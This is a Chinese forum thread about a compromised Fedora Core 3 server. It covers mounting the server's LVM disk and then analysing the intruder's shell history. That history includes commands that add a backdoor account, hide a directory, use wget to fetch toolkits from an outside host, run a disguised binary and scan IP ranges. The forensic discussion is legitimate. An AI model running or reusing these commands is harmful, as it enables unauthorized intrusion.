请教mount问题

qry

有一Fedora Core 3 系统，普通IDE硬盘30G，被黑。

另有一Fedora Core 3系统，装有2个普通IDE硬盘，运行正常。

我把被黑的硬盘，拆下，装到另一系统上的光驱线上。

启动后。

fdisk /dev/hdc
p

看到：

1. 
   
2. Device    Boot      Start         End      Blocks   Id    System
   
3. /dev/hdc1   *           1          13      104391     83   Linux
   
4. /dev/hdc2              14        3737    29913030   8e  Linux LVM
   

复制代码

我就想把/dev/hdc2 mount上去。

但是出现错误如下：

1. 
   
2. [root@localhost dev]# mount -t auto /dev/hdc2 /mnt/hdc2
   
3. mount: you must specify the filesystem type
   
4. 
   
5. [root@localhost dev]# mount -t ext3 /dev/hdc2 /mnt/hdc2
   
6. mount: wrong fs type, bad option, bad superblock on /dev/hdc2,
   
7.        or too many mounted file systems
   

复制代码

奇怪的是/dev/hdc1 用-t auto 和 -t ext3都可以mount.

q1208c

pvscan
vgscan
lvscan

然后试试 mount  lv 吧.

kylints

怎么黑呀

qry

原帖由 "q1208c" 发表：
pvscan
vgscan
lvscan

然后试试 mount  lv 吧.

谢谢，明天去试试。

今天我先用单用户模式把root的密码清掉了。

顺便问一下，如何检查黑客在我的机器上做了什么？当然这是一个模糊的，难以回答的问题，但如果能给一点点提示，我就感激不尽了。

qry

[quote]原帖由 "kylints"]怎么黑呀[/quote 发表：


我这个服务器是自己装着玩的，还没有保护措施。我用ssh在家里也可以连上，方便，但问题就来了。

其实，上个星期，我浏览/var/log/ 下的记录就发现有人再试root密码，我当时想，我一个很简单的密码，竟被试了几千次，我想看看到底会发生什么。

结果，周末，我在家里等不上去了。

而且更坏的是，今天一早上班，收到ISP的通知，说我的upload流量超了。。。

q1208c

原帖由 "qry" 发表：


谢谢，明天去试试。

今天我先用单用户模式把root的密码清掉了。

顺便问一下，如何检查黑客在我的机器上做了什么？当然这是一个模糊的，难以回答的问题，但如果能给一点点提示，我就感激不尽了。

   这个很不好说. 可以先试着看看 log, 如果没被清掉的话.

要是被清掉了就不好办了. 因为你太可能知道原来有哪些文件 , 哪些文件 被动过.

qry

原帖由 "q1208c" 发表：
   这个很不好说. 可以先试着看看 log, 如果没被清掉的话.

要是被清掉了就不好办了. 因为你太可能知道原来有哪些文件 , 哪些文件 被动过.

还好，我还能看到一些 log,例如：/var/log/message, /var/log/secure等，估计那家伙忙着干坏事，忘了清这些了。

我记着有个兄弟在这里列过执行命令的记录，我忘了是哪个文件。

今天我把机器关了，所以只好等明天到公司去看了。

cpsdc

那个记录好像是history

qry

看到了，大家分析一下：

1. 
   
2.   883  adduser original
   
3.   884  passwd original
   
4.   885  uname -a
   
5.   886  ps -x
   
6.   887  cd /var/tmp
   
7.   888  mkdir .bash
   
8.   889   cd .bash
   
9.   890  wget members.lycos.co.uk/cata89/netstat.tgz
   
10.   891  tar zxvf netstat.tgz
    
11.   892  cd netstat
    
12.   893  cat mech.set
    
13.   894  chmod +x *
    
14.   895  ./inetd
    
15.   896  ./inetd
    
16.   897  ./inetd
    
17.   898  ./inetd
    
18.   899  ps -x
    
19.   900  cd
    
20.   901  ls
    
21.   902  wget members.lycos.co.uk/cata89/team3.tgz
    
22.   903  tar zxvf team3.tgz
    
23.   904  cd team2
    
24.   905  chmod +x *
    
25.   906  ls
    
26.   907  ./start 81.56
    
27.   908  ./start 207.89
    
28.   909  ./start 207.90
    
29.   910  ./start 207.91
    
30.   911  ./start 207.92
    
31.   912  ./start 207.93
    
32.   913  ./start 207.94
    
33.   914  ./start 207.95
    
34.   915  ./start 207.96
    

复制代码

qry

[quote]原帖由 "cpsdc"]那个记录好像是history[/quote 发表：


我用history只看到从800号多开始，还好，他的操作都包括了。不过怎样能看到所有的history?